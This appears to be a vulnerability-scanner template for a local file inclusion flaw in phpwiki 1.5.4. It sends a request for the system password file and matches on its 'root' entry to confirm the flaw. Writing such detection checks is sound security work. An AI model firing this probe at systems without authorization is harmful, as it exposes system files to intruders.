id: phpwiki-lfi

info:
  name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
  reference:
    - https://www.exploit-db.com/exploits/38027
  metadata:
    max-request: 1
  tags: xss,edb,phpwiki,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/phpwiki/index.php/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ea31d8e788d8aec70e923edb45d274e581fa57bf7f624ee1e861eafa5f96067e022100809b53d62e4f544193fdeeea66550d17f8e459fe34fcc2aec3e5d9cad0afc8da:922c64590222798bb761d5b6d8e72950
